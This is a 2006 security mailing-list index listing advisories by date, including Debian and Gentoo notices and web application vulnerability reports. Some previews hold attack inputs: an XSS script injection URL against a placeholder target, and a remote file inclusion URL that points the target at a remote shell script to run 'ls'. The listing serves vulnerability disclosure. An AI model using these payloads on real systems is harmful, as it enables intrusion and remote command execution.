[SECURITY] [DSA 1123-1] New libdumb packages fix arbitrary code execution
2006-07-24, Moritz Muehlenhoff (jmm debian org)

Write-up by Amit Klein: "Forging HTTP request headers with Flash"
2006-07-24, Amit Klein (AKsecurity) (aksecurity hotpop com)

ERRATA: [ GLSA 200607-08 ] GIMP: Buffer overflow
2006-07-24, Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Windows XP/NT/SMB2003/2000 Denial of Service attack
2006-07-24, J. Oquendo (joquendo hushmail com)
According to Microsoft the following tool does nothing to Windows based machines. According to my experience it does. According to the experience of 5 separate administrators it does as well. You be the judge of this. Initially this is/was a tool calle…

MusicBox <= 2.3.4 XSS SQL injection Vulnerability
2006-07-24, securityconnection gmail com
MusicBox 2.3.4, http://www.musicboxv2.com
PHPinfo page: /phpinfo.php
Cross Site Scripting (XSS): http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script> &page=0 http://www.target.xx/index.php?id=><…

[USN-322-1] Konqueror vulnerability
2006-07-24, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-322-1, July 24, 2006. kdelibs vulnerability, CVE-2006-3672. A security issue affects the following Ubuntu releases: Ubuntu 5.04, Ubuntu 5.10, U…

Check Point R55W Directory Traversal
2006-07-24, Sec-Tec Lists (zen31438 zen co uk)
Overview: Check Point Firewall-1 R55W contains a hard coded web server, which runs on TCP port 18264. This server is there to deal with PKI requirements for Check Point's VPN functionality. During a routine penetration test of a client, Sec-Tec discovered a directory traversal vulnerability that al…

[SECURITY] [DSA 1124-1] New fbi packages fix potential deletion of user data
2006-07-24, Moritz Muehlenhoff (jmm debian org)

Digital Armaments Security Advisory 24.07.2006: Siemens Speedstream Wireless/Router Denial of Service Vulnerability
2006-07-24, info digitalarmaments com
Digital Armaments advisory is 05.4.2006, http://www.digitalarmaments.com/2006310665340982.html. I. Background: The SpeedStream Wireless DSL/Cable Router is usually adopted for home and small business solutions. Together with an existing DSL or cable modem connection, this affordable, easy to use…

Buffer-overflow in the XM loader of Cheese Tracker 0.9.9
2006-07-23, Luigi Auriemma (aluigi autistici org)

[SECURITY] [DSA 1121-1] New postgrey packages fix denial of service
2006-07-24, joey infodrom org (Martin Schulze)

PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities
2006-07-24, saudi unix hotmail com
PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities. By saudi hackrz. Exploit: http://[target]/[path]/setup/header.php?css_path=http://sit/shell.txt?cmd=ls…

[CYBSEC] TippingPoint detection bypass
2006-07-24, Andres Riancho (ariancho cybsec com)
CYBSEC S.A., www.cybsec.com. Pre-Advisory Name: TippingPoint detection bypass. Vulnerability Class: Design flaw. Release Date: 07/24/2006. Affected Platforms: all TippingPoint appliances with TOS <= 2.2.3.6514. Local / Remote: Remote…

[ GLSA 200607-08 ] GIMP: Buffer overflow
2006-07-23, Sune Kloppenborg Jeppesen (jaervosz gentoo org) (1 reply)

[Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]
2006-07-23, botan linuxmail org

Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.
2006-07-23, mfoxhacker gmail com
Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln. Vendor: Vanilla CMS. Demo: http://demo.opensourcecms.com/vanilla/. Get Source: http://getvanilla.org/. Vuln type: Remote. Risk: High…

[MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities
2006-07-23, admin majorsecurity de
[MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities. Software: Woltlab Burning board. Impact: Cookie manipulation and Session Fixation. Made publi…

[SECURITY] [DSA 1120-1] New Mozilla Firefox packages fix several vulnerabilities
2006-07-23, joey infodrom org (Martin Schulze)

Re: Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability
2006-07-21, sales flexwatch com

Re: [Full-disclosure] Re: New PowerPoint Trojan installs itself as LSP
2006-07-21, Juha-Matti Laurio (juha-matti laurio netti fi)
Many thanks for this useful information. These new types of Trojans are known as Trojan.Riler.F, Win32.Fantador.E etc. Names available have been updated to the PowerPoint FAQ, http://blogs.securiteam.com/?p=508. The following description including information about the proxy-like feature is worth che…

Map MS Security Bulletins to MS KB numbers
2006-07-20, Matthew Leeds (mleeds theleeds net)
I'm looking for a resource that maps Microsoft Security Bulletin numbers (such as MS06-033) to Microsoft Knowledge Base numbers (such as KB 917283). I recognize that this may be a one to many mapping since a single SB may point to a set of possible patches depending on OS version or application vers…

Re: [MajorSecurity #22] Top XL <=1.1 - XSS and cookie disclosure
2006-07-20, admin majorsecurity de
Hi there. There's a little mistake in my advisory. The correct Vendor is: "http://www.derwebgestalter.de/" and the script is available under "http://www.derwebgestalter.de/" and ALSO under "http://www.paddelberg.de/gratis-toplisten-script/". Thanks for your attention. David Vieira Kurz…

Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability
2006-07-20, harbl hushmail com
I. Affected Software: Blackboard Academic Suite 6.2.3.23. Prior or newer versions may also be affected. Vendor website: http://www.blackboard.com/. II. Impact: Subjective: Severe. Objective: Privilege escalation. III. Vulnerability: There is a persistent/…

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
2006-07-20, mail blue-spy net
SolpotCrew Community. Com Multibanners Remote File Inclusion (mosConfig_absolute_path). Original advisory: http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt…

MiniBB Forum <= 1.5a Remote File Include (news.php)
2006-07-20, AG Spider (ag-spider hotmail com)
Title: MiniBB Forum <= 1.5a Remote File Include (news.php). Discovered By AG-Spider. Affected software description:…

DotClear : Multiples Full Path Disclosure
2006-07-22, Silitix gmail com
DotClear: Multiples Full Path Disclosure. Discovered By Silitix - Silitix_gmail_com, www.Silitix.com. A remote user can access the files directly to cause the system to display an error message that indicates the full path of the server. /ecrire/tools/blogroll/edit_cat.php /ecrire/tool…
Debian Security Advisory DSA 1123-1
security (at) debian (dot) org
http://www.debian.org/security/
Moritz Muehlenhoff
July 24th, 2006